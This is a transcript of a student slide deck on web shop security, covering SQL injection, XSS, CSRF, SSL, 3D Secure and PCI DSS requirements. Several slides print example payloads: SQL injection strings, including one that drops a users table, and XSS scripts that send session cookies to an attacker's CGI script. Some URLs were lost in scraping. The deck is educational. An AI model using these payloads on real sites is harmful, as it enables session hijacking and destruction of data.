Presentation is loading. Please wait.

Presentation is loading. Please wait.

Web shop security Zlatan Filipusic, Arman Nasufovic, Arturo Quesada Gil, Andres Reyes Navas and Jimmy Sjöstrand.

Published byKennedy Branson Modified over 9 years ago

Similar presentations

Presentation on theme: "Web shop security Zlatan Filipusic, Arman Nasufovic, Arturo Quesada Gil, Andres Reyes Navas and Jimmy Sjöstrand."— Presentation transcript:

1 Web shop security Zlatan Filipusic, Arman Nasufovic, Arturo Quesada Gil, Andres Reyes Navas and Jimmy Sjöstrand

2 Web shop security User Developer / Admin

3 User perspective Sellers trustworthiness Secure web site – https
Passwords Viruses / Spyware Cookies

4 Payment options Credit Card Direct internet bank payment

5 Electronic credit card, E-card
limited time limited money

6 Confidentiality Integrity Availability
Developers / Administrator perspective Confidentiality Integrity Availability

7 Developing secure homepages
SSL / https PSP 3D Secure PCI DSS Hacking & Cracking Social Engineering Policies Physical Security

8 VULNERABILITIES IN E-COMMERCE INTRODUCTION
Web shop Security VULNERABILITIES IN E-COMMERCE INTRODUCTION e-Commerce grows exponentially. Principally B2B and B2C. INTERNET must provides the communication at the right time in the right way. As the benefits of a enterprise increase in order to the services that it offers better and faster than their competitors, in the same line: Information is MORE SENSITIVE and MORE DANGEROUS in the wrong people  ”Customer information is like gold to marketers”. INTERNET SERVICES are growing exponentially too: more COMPLEX software==more PROBLEMS DEVELOPING software. + More FAST DEVELOPING==more POOR SECURITY implementation. LACK of KNOWLEDGE concerning TO SECURE the customer’s personal information. = WEAKNESSES IN SECURING INFORMATION ARE INCREASING "Your system is only as secure as the people who use it“

9 VULNERABILITIES IN E-COMMERCE THE GENERAL CONTEXT
Web shop Security VULNERABILITIES IN E-COMMERCE THE GENERAL CONTEXT The software environment in web applications are NOT implemented relying on a SECURITY DESIGN Programmers are not well formed in securing programming techniques Weak mechanisms that ensure sanitized inputs and outputs (e.g. improper input validation and improper escaping and structured output) Designers don’t specify an independent and restricted environment for the application Undefined policies for restricting the software environment: Run privileges  total control of the sw environment Error messages  disclosure software architecture and implementation Virtualization  Attacks impact more spread into the sw environmnet Relying on Security through Obscurity Software protections mechanisms relying on secrecy == reversing engineering exploitable Trustworthiness in third parties software Maintainers and managers don’t asses and implement security in the all software lifecycle Misuse of the automated/static and manual/dynamic analysis (e.g fuzzers, scanners, pen testing) RESULT: "You can’t effectively and consistently manage what you can’t measure, and you can’t measure what you haven’t defined…“  SOFTWARE WEAKNESSES

10 Web shop Security VULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “INJECTION” INJECTION attacks happen when untrusted data is sent to an interpreter as a part of a command or query The attacker’s modified data can mislead the interpreter (in the back-end database) executing unintended command or accessing to unauthorized data Two Front-end application Injection’s attacks: Incorrect filtered escape characters Incorrect type handling One back-end application Injection’s attack: Blind Injection

11 Web shop Security VULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “INJECTION EXAMPLES” Incorrectly filtered escape characters The next statement is crafted by the attacker for evaluates always like true: SELECT * FROM users WHERE name = ‘ ‘ OR ‘1’ = ‘1’ In this statement the attacker can force selecting a valid user name, broken the authentication procedure Incorrect type handling The input field is not type constrained (strongly typed), so the attacker can craft the next query: SELECT * FROM userinfo WHERE id = “ + type_not_constrained_input_value + “ ; “ Crafting this statement introducing: 1;DROP TABLE `users` SELECT * FROM userinfo WHERE id = 1;DROP TABLE `users`; In this statement the attacker delete the user’s table in the database, so the integrity of the data has been compromised.

12 Web shop Security VULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “INJECTION EXAMPLES” Blind injection The attacker introduces conditional queries in order to reveal information that is not disclose at first, through error messages database responses finding any possible Injections attacks attempts: A typical attempt: The attacker have this information: SELECT title, description, body FROM items WHERE ID = 2 He/She sends the next query to the database: and 1=2 SELECT title, description, body FROM items WHERE ID = 2 AND 1=2 If the attacker receives a different page from the database, he/she knows that the database is vulnerable to Injection.

13 "SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’"
Web shop Security VULNERABILITIES IN THE E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “INJECTION” (OWASP TOP TEN 2010) Account Summary Acct: Acct: Acct: Acct: Account: SKU: Account: SKU: "SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’" HTTP response  DB Table  HTTP request SQL query Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Application Layer Databases Legacy Systems Web Services Directories Human Resrcs Billing APPLICATION ATTACK 1. Application presents a form to the attacker Custom Code 2. Attacker sends an attack in the form data App Server 3. Application forwards attack to the database in a SQL query Web Server Hardened OS 4. Database runs query containing attack and sends encrypted results back to application Network Layer Firewall Firewall 5. Application decrypts data as normal and sends results to the user

14 Web shop Security VULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “XSS” XSS (Cross Site Scripting) attacks occur when webapps and attackers takes unsanitized data and they send to a user’s web browser. Attackers and the webapp can execute scripts in the user’s browsers for obtain: Session cookies. Redirect the user another malicious sites. Bypass the control access mechanisms (like same origin policy). There are 3 principal variants: Non persistent attack Persistent attack DOM oriented attack This vulnerability rely on the user’s browser trustworthiness put on the webapp

15 Web shop Security VULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “XSS NON-PERSISTENT” Non-persistent attack requires that the user visit any crafted link or any object containing malicious code Example: “This attack perform a theft of user’s authorization when the user is required to introduce the credit card number, in order to obtain access to a Web server stealing the user’s session ID" 1. The attacker catch the server’s not validate response of the request sent by the user: (String) page += "<input name='creditcard' type='TEXT‘value='" + request.getParameter("CC") + "'>"; The attacker introduce the embebed code in order to redirect the user’s session ID to an untrusted web site. He/She uses the “CC” field: '><script>document.location=' bin/cookie.cgi?foo='+document.cookie</script>‘ 3. The attacker receives the user’s session ID in the malicious place and can impersonate the “user’s browser”.

16 Web shop Security VULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “XSS PERSISTENT AND DOM-ORIENTED ATTACK” A persistent attack uses the proper web site to inject the code into the user. Viewing some information crafted into a Javascript, the attacker can introduce this piece of embebed code: <SCRIPT> document.location= ‘ bin/cookiesteal.cgi?’+document.cookie </SCRIPT> A DOM-oriented attack can instigate the user’s browser to execute pieces of modified DOM controled by the attacker. In this case, the embebed malicious code can steal the user’s session cookie by forcing the user to click: <script>alert(document.cookie)</script>

17 Web shop Security VULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “CSRF” CSRF (Cross Site Request Forgery) attacks exploit the webapp’s trustworthiness putting in the user’s browsers These attacks force an authenticated user on a web site to send requests to a server without any knowledge by the user Web servers often are designed to receive “trusted” requests from trusted users without any control mechanisms to verify if they are intended requests: The attacker can trick the web site making unintended requests by the user and being treated like “trusted requests” CSRF together with XSS is a bigger threat because XSS can be used like the base for CSRF’s attack operating under the “same-origin policy “(2 trusted places=same domain and same protocol)

18 VULNERABILITIES IN E-COMMERCE DIFFERENT TECHNIQUES APROACHING WEAKNESSES “CSRF’S ATTACK EXAMPLE”
EXAMPLE: “A user is browsing in a vulnerable web site. He/she needs to transfer money for buy a product. The user is authenticated. How can an attacker compromise the user’s money with a CSRF attack?” 1. The user does a request in the web site, and the request’s content is clear text: 2. The attacker control the traffic and can store information in the web site. He/She receives the request. He construct a new request transfering money from the user’s account to the attacker’s account and embebe this code into a “image tag request” and stored in the vulnerable web site: <imgsrc=" height="0" /> 3. If the user stored the cookie with session info, browsing in the web site while the user is authenticated and “viewing” the image the forged request embebed will allow from the user’s browser the “authorized” hidden request

19 VULNERABILITIES IN E-COMMERCE SOME STATISTICS (FROM 2008) web applications with detected vulnerabilities

20 Social Engineering Targets Teknique Consequence Prevention

21 Policy Making Purpose Statement Applicability and Scope statement
Effective date Responsibilities Policy Statement Background Definitions

22 Physical Security Lockup the Server rooms Set up surveillance
Make sure vulnerable devices are locked up Use rack mount servers Don’t forget about the workstations Keep intuders out of the computer/server case

23 Physical Security Protect portable devices
Take backups and keep them secure Disable the drives Protect your printers

24 SSL Secure Sockets Layer
Enables secure data exchange between client and server Protocol below the Application layer Confidentiality (Encryption) Integrity (MAC)

25 SSL Services Fragmentation Devides data into blocks of 2^14 bytes
Compression Data can be compressed, optional Message Integrity Keyed hash function with MAC Confidentiality Symmetric key cryptography Framing

26 Handshake No handshake, no security Enables exchange of keys
Reduces the risk of Man in the middle attacks Setting upp parameters About 10 steps in the handshake What cipher suites, SSL versions are supported Client gets the servers public key from the server certificate Client creates pre master secret, sends it encrypted to the server Pre master secret creates a master secret Master secret is then used to create session keys and auth keys

27 MAC Message Authentication Code
A hash using the message and authentication key Used to authenticate the sender of a message (Message+Authkey) = Hash

28 Putting it all together Exchange of information using SSL

29 SSL Weaknesses Cipher suites can be weak Man in the middle Keyjacking
Fake certificates

30 PSP: Payment Service Provider
Web shop Security PSP: Payment Service Provider DEFINITION OF PSP “PSPs offers merchants online services for accepting electronic payments by a variety of payment methods including credit card, bank-based payments such as direct debit, bank transfer, and real-time bank transfer based on online banking.” Solution for problems in connecting e-market with banks 2 different fee policies Security

31 List of PSPs

32 3D SECURE DEFINITION OF 3D SECURE Security
”3D Secure is an XML-Based protocol used as an added layer of security for online credit and debit card transactions.” Security Three domain model for authentication: Acquirer Domain Issuer Domain Interoperability Domain Based on SET

33 PCI DSS Payment Card Industry Data Security Standard
Security standard to control credit card info Defined by the PCI SSC Unified from: Visa Card Information Security MasterCard Site Data Protection American Express Data Security Operating Policy Discover Information and Compliance JBC Data security Program Objectives Protected and Unprotected Data Security techniques

34 PCI DSS Requirements Build and maintain a Secure Network
1. Install and maintain a firewall configuration to protect cardholder data. 2. Do not use vendor-supplied defaults for system passwords and other security parameters. Protect cardholder Data 3. Protect stored cardholder data. 4. Encrypt transmissions of cardholder data across open, public networks. Maintain a vulnerability management program 5. Use and regularly update anti-virus software on all systems commonly affected by malware. 6. Develop and maintain secure systems and applications. Implement strong access control measures 7. Restrict access to cardholder data by business need-to-know. 8. Assign a unique ID to each person with computer access. 9. Restrict physical access to cardholder data. Regularly monitor and test networks 10. Track and monitor all access to network resources and cardholder data. 11. Regularly test security systems and processes. Maintain an information security policy 12. Maintain a policy that addresses information security.

Download ppt "Web shop security Zlatan Filipusic, Arman Nasufovic, Arturo Quesada Gil, Andres Reyes Navas and Jimmy Sjöstrand."

Similar presentations

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.

Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP.
CP3397 ECommerce.

CP3397 ECommerce.
1 Lecture 17: SSL/TLS history, architecture basic handshake session initiation/resumption key computation negotiating cipher suites application: SET.

1 Lecture 17: SSL/TLS history, architecture basic handshake session initiation/resumption key computation negotiating cipher suites application: SET.
Cryptography and Network Security

Cryptography and Network Security
7-1 Chapter 7 – Web Security Use your mentality Wake up to reality —From the song, I've Got You under My Skin“ by Cole Porter.

7-1 Chapter 7 – Web Security Use your mentality Wake up to reality —From the song, "I've Got You under My Skin“ by Cole Porter.
An Introduction to Secure Sockets Layer (SSL). Overview Types of encryption SSL History Design Goals Protocol Problems Competing Technologies.

An Introduction to Secure Sockets Layer (SSL). Overview Types of encryption SSL History Design Goals Protocol Problems Competing Technologies.
Module 5: TLS and SSL 1. Overview Transport Layer Security Overview Secure Socket Layer Overview SSL Termination SSL in the Hosted Environment Load Balanced.

Module 5: TLS and SSL 1. Overview Transport Layer Security Overview Secure Socket Layer Overview SSL Termination SSL in the Hosted Environment Load Balanced.
Topic 8: Secure communication in mobile devices. Choice of secure communication protocols, leveraging SSL for remote authentication and using HTTPS for.

Topic 8: Secure communication in mobile devices. Choice of secure communication protocols, leveraging SSL for remote authentication and using HTTPS for.
It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.

It’s always better live. MSDN Events Security Best Practices Part 2 of 2 Reducing Vulnerabilities using Visual Studio 2008.
Cryptography and Network Security Chapter 17

Cryptography and Network Security Chapter 17
WEB SECURITY. WEB ATTACK TYPES Buffer OverflowsXML InjectionsSession Hijacking Attacks WEB Attack Types.

WEB SECURITY. WEB ATTACK TYPES Buffer OverflowsXML InjectionsSession Hijacking Attacks WEB Attack Types.
Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.

Information Networking Security and Assurance Lab National Chung Cheng University The Ten Most Critical Web Application Security Vulnerabilities Ryan J.W.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
CSE 4482, 2009 Session 21 Personal Information Protection and Electronic Documents Act Payment Card Industry standard Web Trust Sys Trust.

CSE 4482, 2009 Session 21 Personal Information Protection and Electronic Documents Act Payment Card Industry standard Web Trust Sys Trust.
SSL By: Anthony Harris & Adam Shkoler. What is SSL? SSL stands for Secure Sockets Layer SSL is a cryptographic protocol which provides secure communications.

SSL By: Anthony Harris & Adam Shkoler. What is SSL? SSL stands for Secure Sockets Layer SSL is a cryptographic protocol which provides secure communications.
Chapter 8 Web Security.

Chapter 8 Web Security.
Security on the Internet Jan Damsgaard Dept. of Informatics Copenhagen Business School

Security on the Internet Jan Damsgaard Dept. of Informatics Copenhagen Business School
Payment Card Industry (PCI) Data Security Standard

Payment Card Industry (PCI) Data Security Standard
NUAGA May 22, 2014.  IT Specialist, Utah Department of Technology Services (DTS)  Assigned to Department of Alcoholic Beverage Control  PCI Professional.

NUAGA May 22,  IT Specialist, Utah Department of Technology Services (DTS)  Assigned to Department of Alcoholic Beverage Control  PCI Professional.
PCI requirements in business language What can happen with the cardholder data?

PCI requirements in business language What can happen with the cardholder data?

Similar presentations

Ads by Google